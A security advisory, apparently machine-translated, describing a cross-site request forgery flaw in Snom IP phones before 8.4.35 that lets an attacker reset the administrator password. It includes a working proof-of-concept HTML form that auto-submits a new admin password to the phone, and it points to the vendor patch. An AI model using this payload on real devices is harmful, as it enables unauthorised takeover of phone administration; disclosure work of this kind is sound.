Snom IP Phone earlier than 8.4.35 permission Escalation Vulnerability

Release date:
Updated on:

Affected Systems:
Snom IP Phone <8.4.35
Description:
--------------------------------------------------------------------------------
Snom is a German VoIP phone manufacturer.

Snom IP Phone has a security vulnerability in implementation. The Administrator Logon table is the same as the management password reset table. You do not need to enter the old password to change the password, resulting in Cross-Site Request Forgery, thus improving permissions.

<* Source: Nathaniel Carew

Link: http://packetstormsecurity.org/files/110115/Snop-IP-Phone-Privilege-Escalation.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Nathaniel Carew () provides the following test methods:

<? Php echo htmlentities ('<Head> <Body onLoad = javascript: document. form. submit ()>
<Form action = "http://x.x.x.x/advanced_network.htm" name = "form"
Method = "POST">
<Input type = "text" name = "admin_mode" value = "on">
<Input type = "text" name = "admin_mode_password" value = "newpass">
<Input type = "text" name = "admin_mode_password_confirm" value = "newpass">
<Input type = "text" name = "Settings" value = "save">
</Form>
</Body> <br>
</Html> ');?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Snom
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.snom.de/